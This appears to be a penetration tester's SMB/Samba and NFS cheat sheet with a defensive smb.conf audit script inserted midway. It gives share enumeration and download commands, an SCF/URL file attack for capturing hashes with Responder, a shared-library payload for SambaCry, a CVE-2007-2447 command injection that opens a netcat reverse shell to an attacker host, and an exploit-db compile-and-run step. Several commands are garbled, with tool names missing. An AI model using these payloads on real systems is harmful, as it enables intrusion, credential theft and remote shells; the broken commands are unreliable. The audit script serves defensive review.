Port: 445, 139




#Protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
#Add to 'global' section in /etc/samba/smb.conf
client min protocol = LANMAN1
  • Nmap scripts

    • smb-os-discovery.nse [OS detection]

    • smb-vuln* [checks for Windows remote vulnerabilities]

    • smb-vuln-ms17-010 [checks if an SMBv1 server is vulnerable]

Enumerating Shares

enum4linux -a <IP>
python3 -u "username" -p "password" -q

#List Shares
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbmap -H <IP> -u username -p password

crackmapexec smb -u notarealuser -p '' --shares <IP>

#Servers that only speak the deprecated SMB1/NT1 dialect
smbclient -L //<IP> --option='client min protocol=NT1'

#If the server requests a LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes' is set,
#add the following to /etc/samba/smb.conf to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no

#List contents of a share
smbmap -R <Share_name> -H <IP>
smbclient //<IP>/<Share_name>
#-k uses the cached Kerberos TGT (needs the hostname, not the IP)
smbclient -k -L //<hostname.domain.local>

#Download shares [-q : quiet mode]
smbmap -R <Share_name> -H <IP> -A <Filename> -q -u notarealusername
smbclient //<IP>/<Share_name> -U ""%"" -c 'prompt OFF;recurse ON;mget *'
#Or, inside an interactive smbclient session:
get file.txt

#Logging into an SMB share [-N : suppresses the password prompt]
smbclient //<IP>/<Share_name> -U "Username"%"Password"
smbclient -N //<IP>/<Share_name>

#impacket target syntax: <Domain>/<Username>:<Password>@<IP-Address>
  • In case of error "[!] Authentication error on <IP>" from:

smbmap -H <IP> -u notausername
#Try upgrading impacket
pip3 install --upgrade impacket

Version Enumeration


sudo python -s <IP>

Manually Identify Version

  • Run Wireshark and start sniffing

  • Run: smbclient -L //<IP>

  • Stop sniffing and find the packet with Protocol: SMB, Info: Session Setup AndX Response; its Native OS and Native LAN Manager fields carry the version string the server advertises.

RestrictAnonymous Bypass

  • Username enumeration via SID walk

Mounting Shares

NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares and access, create and modify files. By default, created files inherit the remote user's uid and gid (as owner and group respectively), even if those ids don't exist on the NFS server.

#Check for mountable (exported) shares
showmount -e <IP>

#Lists current mounted directories
df -k

ls /mnt
#Mount a CIFS share (leave the password empty for a null login)
mount -t cifs -o username=notarealname,password= //<IP>/<share> /mnt/local_dir_name

#Mount NFS shares (-o vers=2 only for old servers)
sudo mkdir /tmp/tmpdir
sudo mount -t nfs [-o vers=2] <IP>:<remote_folder> /tmp/tmpdir -o nolock
#Unmount all CIFS mounts
sudo umount -a -t cifs

#Script for checking which mounted directories are writable (removes the test file again)
for d in $(find /mnt -type d); do
  if touch "$d/x" 2>/dev/null; then
    echo "$d is writable"
    rm -f "$d/x"
  fi
done

Mounting VHD Shares

#Mount the share
mount -t cifs -o 'rw,username=guest' //<IP>/<share> /mnt/remote
#Mount the vhd file found within this share
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion
  • Tip: Look for the SAM, SECURITY and SYSTEM hive files in C:\Windows\System32\config

Write-Access Attack

SCF and URL file attack against a writeable share

Drop an @something.scf / something.scf file inside the share and start listening with Responder:

  • responder -wrf --lm -v -I eth0 (may not work all the time, try both commands)

  • responder -I tun0


This attack also works with .url files.


Setting up a Samba Server

sudo -smb2support Data $(pwd)

chmod +x /path/to/share/

#Share definition in /etc/samba/smb.conf
[<share_name>]
path = /path/to/share
writeable = yes
browseable = yes
public = yes

service smbd restart

#Map the share to a drive letter on Windows
net use k: \\<IP>\myshare

#To remove the mapping
net use k: /delete

#Create an NTFS disk image (2GB) and mount it through a loop device
dd if=/dev/zero of=ntfs.disk bs=1024M count=2
losetup -h
sudo losetup -fP ntfs.disk
#Use the loop device reported here in the following commands
losetup -a
sudo mkfs.ntfs /dev/loop0
sudo mount /dev/loop0 /directory/to/mount
mount | grep /directory/to/mount

SambaCry CVE-2017-7494 [RCE]


  • Remote code execution from a writable share.

  • Versions affected: All versions of Samba from 3.5.0 onwards.

  • Description: Malicious clients can upload and cause the smbd server to execute a shared library from a writable share.

Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
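The client-side settings at the top of this page (LANMAN1 minimum protocol, LANMAN auth, NTLMv2 off), the public writeable share under "Setting up a Samba Server", and the writable-share precondition of SambaCry can all be checked for in an smb.conf. The audit script here is an added example, not code from the original page or from the Samba project; the sample config is constructed, and the checks (including treating `nt pipe support = no` as Samba's published CVE-2017-7494 workaround for unpatched builds) are a baseline I chose, not an exhaustive policy.

```python
import configparser

TRUE = {"yes", "true", "1"}
SMB1 = {"core", "coreplus", "lanman1", "lanman2", "nt1"}  # dialects below SMB2

# Constructed sample, not from a real host: the client-side settings this page
# enables, plus the share definition from "Setting up a Samba Server".
WEAK_CONF = """
[global]
   client min protocol = LANMAN1
   client lanman auth = yes
   client ntlmv2 auth = no
[Data]
   path = /path/to/share
   writeable = yes
   public = yes
"""

def _flag(sec, *names, default="no"):
    """Boolean of the first synonym present in the section, else Samba's default."""
    return next((sec[n] for n in names if n in sec), default).strip().lower() in TRUE

def _writable(sec):
    if "writeable" in sec or "writable" in sec:
        return _flag(sec, "writeable", "writable")
    return not _flag(sec, "read only", default="yes")  # 'read only' is the inverse

def audit(text):
    """Return [(section, finding)] for settings the attacks on this page rely on."""
    # Samba's dialect: '#'/';' comments, case-insensitive keys, literal %U macros.
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   inline_comment_prefixes=("#", ";"))
    cp.optionxform = lambda key: " ".join(key.lower().split())
    cp.read_string(text)
    out, g = [], next((cp[s] for s in cp.sections() if s.lower() == "global"), {})
    for key in ("server min protocol", "client min protocol"):
        if key in g and g[key].strip().lower() in SMB1:
            out.append(("global", f"{key} = {g[key].strip()} allows SMB1 dialects"))
    if _flag(g, "lanman auth") or _flag(g, "client lanman auth"):
        out.append(("global", "LANMAN authentication enabled"))
    if "client ntlmv2 auth" in g and not _flag(g, "client ntlmv2 auth", default="yes"):
        out.append(("global", "NTLMv2 disabled for client connections"))
    if _flag(g, "nt pipe support", default="yes"):
        out.append(("global", "nt pipe support on; 'no' was Samba's CVE-2017-7494 workaround"))
    for name in (s for s in cp.sections() if s.lower() != "global"):
        guest, rw = _flag(cp[name], "guest ok", "public"), _writable(cp[name])
        if guest or rw:
            kind = ("anonymous " if guest else "") + ("writable" if rw else "readable")
            out.append((name, kind + " share"))
    return out
```

Run `audit(open("/etc/samba/smb.conf").read())` on a real host; an empty list means none of the settings this page relies on are present.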


  • Clone the GitHub repo

#Payload library: the constructor attribute makes smash() run as soon as the .so is loaded
#include <stdio.h>
#include <stdlib.h>

static void smash() __attribute__((constructor));

void smash() {
    system("<put a bash command here>");
}

then compile with
gcc -o <outfile.so> -shared <infile.c> -fPIC


Samba 3.0.24

  • Version : smbd 3.0.20-Debian [With Anonymous Login]

  • CVE-2007-2447

    • logon : change user once connected

#Set up a listener on the attacker's system first, then connect:
smbclient //<victim_IP>/tmp --option='client min protocol=NT1'

#Inside the smbclient session:
logon "/=`nohup nc -nv <attacker_IP> 4444 -e /bin/sh`"

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

searchsploit -m 10
gcc exploit.c -o exploit
./exploit -b 0 -v <IP>
